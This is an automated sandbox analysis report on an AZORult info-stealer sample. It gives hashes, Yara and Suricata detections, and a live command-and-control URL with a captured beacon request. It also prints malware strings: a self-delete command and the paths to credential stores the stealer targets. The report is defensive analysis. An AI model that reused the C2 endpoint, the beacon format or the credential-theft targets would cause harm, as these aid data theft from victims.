Edit tour

Windows Analysis Report
8p5iD52knN.exe

Overview

General Information

Sample name:	8p5iD52knN.exe renamed because original name is a hash value
Original sample name:	c30e2baf61f34324ccbd0b0168def45e.exe
Analysis ID:	1582990
MD5:	c30e2baf61f34324ccbd0b0168def45e
SHA1:	9ae0549752733b79f244fccb6572792dacd68b50
SHA256:	0ac763391fc56711f3df8e6d6c047bd299c2b7052a69fb66a43fcab1c1b74826
Tags:	AZORultexeuser-abuse_ch
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Azorult

Yara detected Azorult Info Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

8p5iD52knN.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\8p5iD52knN.exe" MD5: C30E2BAF61F34324CCBD0B0168DEF45E)

WerFault.exe (PID: 648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://any.run/cybersecurity-blog/azorult-malware-analysis/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x1085:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Process Memory Space: 8p5iD52knN.exe PID: 7064	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: 8p5iD52knN.exe PID: 7064	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.8p5iD52knN.exe.5e0000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.3.8p5iD52knN.exe.5e0000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.3.8p5iD52knN.exe.5e0000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xbf78:$a2: %APPDATA%\.purple\accounts.xml 0xc6c0:$a3: %TEMP%\curbuf.dat 0x189d4:$a4: PasswordsList.txt 0x139d8:$a5: Software\Valve\Steam
0.2.8p5iD52knN.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.8p5iD52knN.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.3.8p5iD52knN.exe.5e0000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17078:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x114ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.8p5iD52knN.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.3.8p5iD52knN.exe.5e0000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x16e18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x17478:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18b60:$v2: http://ip-api.com/json 0x177d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.2.8p5iD52knN.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.8p5iD52knN.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.3.8p5iD52knN.exe.5e0000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.3.8p5iD52knN.exe.5e0000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.3.8p5iD52knN.exe.5e0000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.3.8p5iD52knN.exe.5e0000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.3.8p5iD52knN.exe.5e0000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.2.8p5iD52knN.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.8p5iD52knN.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.8p5iD52knN.exe.400000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
0.2.8p5iD52knN.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.8p5iD52knN.exe.400000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Click to see the 15 entries

Suricata Signatures

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T10:22:06.950300+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.4	49730	51.15.241.168	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T10:22:06.950300+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.4	49730	51.15.241.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8p5iD52knN.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php"}

Multi AV Scanner detection for submitted file

Source: 8p5iD52knN.exe	Virustotal: Detection: 62%			Perma Link
Source: 8p5iD52knN.exe	ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Machine Learning detection for sample

Source: 8p5iD52knN.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_004094C4 CryptUnprotectData,LocalFree,

0_2_004094C4

Source: 8p5iD52knN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\8p5iD52knN.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 51.15.241.168:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49730 -> 51.15.241.168:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php

Source: Joe Sandbox View

ASN Name: OnlineSASFR OnlineSASFR

Source: global traffic

HTTP traffic detected: POST /AED77D05-A028-477C-B013-04F33F1385C3/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.241.168Content-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 9c 45 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 67 8b 31 11 8b 30 62 8b 30 65 ef 47 11 ed 26 66 9d 26 66 9d Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;1&fEp10l0b0g10b0eG&f&f

Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.241.168

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.4.5Date: Wed, 01 Jan 2025 09:22:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 571Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3</center></body></html>

Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.241.168/
Source: 8p5iD52knN.exe, 00000000.00000003.1735068844.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, 8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php
Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn
Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl
Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn
Source: 8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: 8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dotbit.me/a/

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_004381A5 PeekMessageA,GetConsoleAliasesW,CreateNamedPipeA,CreateMemoryResourceNotification,DlgDirSelectComboBoxExW,InsertMenuItemW,AppendMenuW,UnloadKeyboardLayout,SetRectRgn,ExtractAssociatedIconA,ExtractIconEx,FindFirstChangeNotificationW,GetRegisteredRawInputDevices,GetRegisteredRawInputDevices,GetNextDlgGroupItem,CallMsgFilter,OpenClipboard,GetClipboardSequenceNumber,GetLastError,DragQueryFileW,ShellAboutA,LoadMenuIndirectA,LoadIconW,MapVirtualKeyExW,StretchBlt,SetPixel,ShellExecuteA,BeginPaint,GetTickCount,GetSystemTimes,GetCPInfo,GlobalMemoryStatus,GetProcAddress,LoadLibraryA,GlobalAlloc,GlobalAlloc,VirtualProtect,GetStartupInfoW,SetProcessShutdownParameters,GetLastError,GetTickCount,

0_2_004381A5

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043A01E	0_2_0043A01E
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043B953	0_2_0043B953
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043C23E	0_2_0043C23E
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043B40F	0_2_0043B40F
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043C543	0_2_0043C543
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043E6D2	0_2_0043E6D2
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043AEE4	0_2_0043AEE4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0043BFC3	0_2_0043BFC3
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0061F142	0_2_0061F142

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: String function: 004034E4 appears 36 times

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016

Source: 8p5iD52knN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
